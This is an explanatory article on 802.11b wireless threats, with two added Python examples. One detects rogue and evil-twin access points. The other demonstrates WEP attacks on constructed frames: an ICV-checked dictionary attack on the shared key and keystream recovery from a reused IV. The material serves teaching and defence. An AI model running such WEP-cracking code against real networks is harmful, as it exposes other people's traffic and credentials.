Known Risks
Although attacks against 802.11b and other wireless technologies will undoubtedly increase in
number and sophistication over time, most current 802.11b risks fall into six basic categories:
- Insertion attacks
- Interception and unauthorized monitoring of wireless traffic
- Jamming
- Client-to-Client attacks
- Brute force attacks against access point passwords
- Encryption attacks
Note that these classifications can apply to any wireless technology, not just 802.11b.
Understanding how they work and using this information to prevent their success is a good
stepping stone for any wireless solution.
Insertion Attacks
Insertion attacks are based on deploying unauthorized devices or creating new wireless networks
without going through the organization's security process and review.
- Unauthorized Clients – An attacker tries to connect a wireless client, typically a laptop or PDA,
to an access point without authorization. Access points can be configured to require a
password for client access. If there is no password, an intruder can connect to the internal
network simply by enabling a wireless client to communicate with the access point. Note,
however, that some access points use the same password for all client access, requiring all
users to adopt a new password every time the password needs to be changed.
- Unauthorized or Renegade Access Points – An organization may not be aware that internal
employees have deployed wireless capabilities on their network. This lack of awareness could
lead to the previously described attack, with unauthorized clients gaining access to corporate
resources through a rogue access point. Organizations need to implement policy to ensure
secure configuration of access points, plus an ongoing process in which the network is scanned
for the presence of unauthorized devices.
Interception and Monitoring of Wireless Traffic
As in wired networks, it is possible to intercept and monitor network traffic across a wireless LAN.
The attacker needs to be within range of an access point (approximately 300 feet for 802.11b) for
this attack to work, whereas a wired attacker can be anywhere where there is a functioning
network connection. The advantage for the wireless attacker is that a wired interception requires
placing a monitoring agent on a compromised system, whereas all a wireless intruder needs is
to be within range of the radio signal to read the network data stream.
There are two important considerations to keep in mind with the range of 802.11b access points.
First, directional antennae can dramatically extend either the transmission or reception ranges of
802.11b devices. Therefore, the 300 foot maximum range attributed to 802.11b only applies to
normal, as-designed installations. Enhanced equipment also enhances the risk. Second, access
points transmit their signals in a circular pattern, which means that the 802.11b signal almost
always extends beyond the physical boundaries of the work area it is intended to cover. This
signal can be intercepted outside buildings, or even through floors in multistory buildings. Careful
antenna placement can significantly affect the ability of the 802.11b signal to reach beyond
physical corporate boundaries.
- Wireless Packet Analysis – A skilled attacker captures wireless traffic using techniques
similar to those employed on wired networks. Many of these tools capture the first part of the
connection session, where the data would typically include the username and password. An
intruder can then masquerade as a legitimate user by using this captured information to hijack
the user session and issue unauthorized commands.
- Broadcast Monitoring – If an access point is connected to a hub rather than a switch, any
network traffic across that hub can potentially be repeated out over the wireless network.
Because an Ethernet hub repeats every packet to all connected devices, including the
wireless access point, an attacker can monitor sensitive wired traffic that was never
intended for any wireless client.
- Access Point Clone (Evil Twin) Traffic Interception – An attacker fools legitimate wireless
clients into connecting to the attacker’s own network by placing an unauthorized access point
with a stronger signal in close proximity to wireless clients. Users attempt to log into the
attacker's substitute servers and unknowingly give away passwords and similar sensitive data.
Jamming
Denial of service attacks are also easily applied to wireless networks: legitimate traffic cannot
reach clients or the access point because illegitimate traffic overwhelms the frequencies. An
attacker with the proper equipment and tools can easily flood the 2.4 GHz band, corrupting
the signal until the wireless network ceases to function. In addition, cordless phones, baby
monitors and other devices that operate on the 2.4 GHz band can disrupt a wireless network
using this frequency. These denials of service can originate from outside the work area served
by the access point, or can arrive inadvertently from other 802.11b devices installed in
neighbouring work areas, whose overlapping channels degrade the overall signal.
Client-to-Client Attacks
Two wireless clients can talk directly to each other, bypassing the access point. Users therefore
need to defend clients not just against an external threat but also against each other.
- File Sharing and Other TCP/IP Service Attacks – Wireless clients running TCP/IP services
such as a Web server or file sharing are open to the same exploits and misconfigurations as
the same services on a wired host.
- DoS (Denial of Service) – A wireless device floods other wireless clients with bogus packets,
creating a denial of service. In addition, duplicate IP or MAC addresses, both intentional
and accidental, can cause disruption on the network.
Brute Force Attacks Against Access Point Passwords
Most access points use a single key or password that is shared with all connecting wireless
clients. Brute force attacks attempt to compromise this key by methodically testing every
possible value; dictionary attacks shortcut this by testing likely passwords first. The intruder
gains access to the access point once the key is guessed.
In addition, passwords can be compromised through less aggressive means. A compromised
client exposes the shared key stored on it, and with it the access point. Not changing the keys on a frequent basis or when
employees leave the organization also opens the access point to attack. Managing a large
number of access points and clients only complicates this issue, encouraging lax security
practices.
Attacks against Encryption
The 802.11b standard uses an encryption system called WEP (Wired Equivalent Privacy). WEP has
known weaknesses (see http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html for more
information), and these issues are not slated to be addressed before 2002. Few tools are
readily available for exploiting these weaknesses, but sophisticated attackers can certainly build their own.
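The Insertion Attacks section above calls for an ongoing scan of the network for unauthorized access points, and the Interception section describes the evil twin, a clone that advertises the same SSID with a stronger signal. Both controls come down to comparing what a wireless scan sees with an inventory of authorized access points. The following is an added example written for this page, not code from the original article: the inventory, the BSSIDs, the signal levels and the one-AP-per-line scan format are all constructed, and the evil-twin rule is the one described above (known SSID, unknown BSSID, louder than any legitimate access point serving that SSID).

```python
"""Added example: classify the access points seen by a wireless scan against an
inventory of authorized APs, to catch renegade access points and evil twins.
All inventory entries, BSSIDs and scan lines below are constructed."""
import re
from dataclasses import dataclass

# Constructed inventory of authorized access points: SSID -> set of BSSIDs.
AUTHORIZED = {
    "CorpNet": {"00:40:96:a1:b2:c3", "00:40:96:a1:b2:c4"},
}


@dataclass(frozen=True)
class Observation:
    bssid: str
    ssid: str
    channel: int
    signal_dbm: int
    encrypted: bool


# Constructed scan output, one AP per line: BSSID SSID CHANNEL SIGNAL_DBM ENC.
# This is a made-up format for the example (SSIDs without spaces), not any
# scanner's native output.
SAMPLE_SCAN = """\
00:40:96:a1:b2:c3 CorpNet 6 -48 on
00:40:96:a1:b2:c4 CorpNet 11 -61 on
00:0c:29:7e:11:22 CorpNet 6 -35 on
00:50:f2:3d:aa:01 linksys 6 -70 off
00:40:96:a1:b2:c5 GuestNet 1 -55 on
"""

_LINE = re.compile(r"^(\S+)\s+(\S+)\s+(\d+)\s+(-?\d+)\s+(on|off)$")


def parse_scan(text: str) -> list:
    """Parse the constructed scan format into Observation records."""
    observations = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        match = _LINE.match(line)
        if not match:
            raise ValueError(f"unparseable scan line: {line!r}")
        bssid, ssid, channel, signal, enc = match.groups()
        observations.append(
            Observation(bssid.lower(), ssid, int(channel), int(signal), enc == "on")
        )
    return observations


def classify(observations: list, authorized: dict) -> dict:
    """Map each observed BSSID to a verdict: authorized, evil-twin (known SSID,
    unknown BSSID), evil-twin louder than every legitimate AP for that SSID,
    or an unknown SSID that needs a walk-down (flagged separately when open)."""
    # Strongest signal seen from a legitimate AP, per SSID, for the evil-twin rule.
    best_legit = {}
    for obs in observations:
        if obs.bssid in authorized.get(obs.ssid, set()):
            best_legit[obs.ssid] = max(best_legit.get(obs.ssid, -1000), obs.signal_dbm)

    verdicts = {}
    for obs in observations:
        known_bssids = authorized.get(obs.ssid)
        if known_bssids is None:
            verdicts[obs.bssid] = "unknown-ap" if obs.encrypted else "open-unknown-ap"
        elif obs.bssid in known_bssids:
            verdicts[obs.bssid] = "authorized"
        else:
            legit = best_legit.get(obs.ssid)
            if legit is not None and obs.signal_dbm > legit:
                verdicts[obs.bssid] = "evil-twin-stronger-than-legitimate"
            else:
                verdicts[obs.bssid] = "evil-twin"
    return verdicts


if __name__ == "__main__":
    for bssid, verdict in classify(parse_scan(SAMPLE_SCAN), AUTHORIZED).items():
        print(f"{bssid}  {verdict}")
```

An unknown SSID can simply be a neighbour's network, so the scan only locates candidates; following the signal strength to the device and checking the wired side confirm whether it is a renegade access point bridged into the corporate LAN, which a scan from the air cannot tell on its own.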
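The two preceding sections, guessing the shared key and exploiting WEP's own design, can both be shown against frames built the way WEP builds them: a 24-bit IV sent in the clear, RC4 keyed with IV || key, and a CRC-32 integrity check value (ICV) appended to the payload before encryption. The following is an added example written for this page, not code from the original article or from the Berkeley FAQ it cites; the key, IV, wordlist and packet contents are constructed, and the key-ID byte of a real WEP frame is omitted. It shows the ICV acting as the verification oracle for a dictionary attack on a 40-bit key, keystream reuse when two frames share an IV, and the birthday estimate of how few frames it takes before some IV repeats.

```python
"""Added example for this page: WEP-style frames, a dictionary attack that uses
the ICV as its check, and keystream recovery from IV reuse. Not code from the
original article; all keys, IVs and packet contents are constructed."""
import math
import struct
import zlib

IV_BITS = 24  # WEP's IV is 24 bits and travels in the clear in front of each frame


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 key scheduling plus keystream generation, XORed onto data."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def icv(plaintext: bytes) -> bytes:
    """WEP's integrity check value: plain CRC-32 of the payload, little-endian."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame = IV || RC4(IV || key, plaintext || ICV). Key-ID byte omitted."""
    assert len(iv) == IV_BITS // 8
    return iv + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key: bytes, frame: bytes):
    """Return the payload if the ICV verifies under `key`, otherwise None."""
    iv, body = frame[:3], frame[3:]
    data = rc4(iv + key, body)
    plaintext, tag = data[:-4], data[-4:]
    return plaintext if icv(plaintext) == tag else None


def dictionary_attack(frame: bytes, wordlist):
    """Try each 5-character word as a 40-bit key. A wrong key passes the CRC
    check with probability 2**-32, so one captured frame is a practical oracle."""
    for word in wordlist:
        key = word.encode()
        if len(key) != 5:
            continue
        if wep_decrypt(key, frame) is not None:
            return word
    return None


def recover_with_iv_reuse(frame_a: bytes, frame_b: bytes, known_plaintext_a: bytes) -> bytes:
    """Two frames under the same key and IV share a keystream. Knowing frame A's
    payload yields that keystream, which strips frame B without the key."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("frames do not share an IV")
    body_a, body_b = frame_a[3:], frame_b[3:]
    expected_a = known_plaintext_a + icv(known_plaintext_a)
    keystream = bytes(c ^ p for c, p in zip(body_a, expected_a))
    recovered = bytes(c ^ k for c, k in zip(body_b, keystream))
    # When the keystream covers all of frame B, its last four bytes are B's ICV.
    return recovered[:-4] if len(recovered) == len(body_b) else recovered


def iv_collision_50pct_frames() -> int:
    """Frames needed for a 50% chance that some IV repeats (birthday bound),
    assuming IVs are drawn uniformly at random from the 24-bit space."""
    return int(math.sqrt(2 * math.log(2) * 2 ** IV_BITS))


def demo() -> dict:
    key = b"Sekr3"           # constructed 40-bit shared key
    iv = b"\x01\x02\x03"     # constructed IV, deliberately reused below
    page_a = b"GET /index.html HTTP/1.0\r\n"   # constructed, assumed known to the attacker
    page_b = b"user=alice&pass=hunter2"        # constructed, the frame being attacked
    frame_a = wep_encrypt(key, iv, page_a)
    frame_b = wep_encrypt(key, iv, page_b)
    return {
        "guessed_key": dictionary_attack(frame_a, ["admin", "12345", "password", "Sekr3"]),
        "recovered_b": recover_with_iv_reuse(frame_a, frame_b, page_a),
        "frames_to_iv_collision": iv_collision_50pct_frames(),
    }


if __name__ == "__main__":
    print(demo())
```

The keystream recovery needs no key at all, only one frame whose contents are predictable (protocol headers and fixed request lines are enough), which is why a small IV space and a shared key are a combination worth treating as an exposed network rather than an encrypted one.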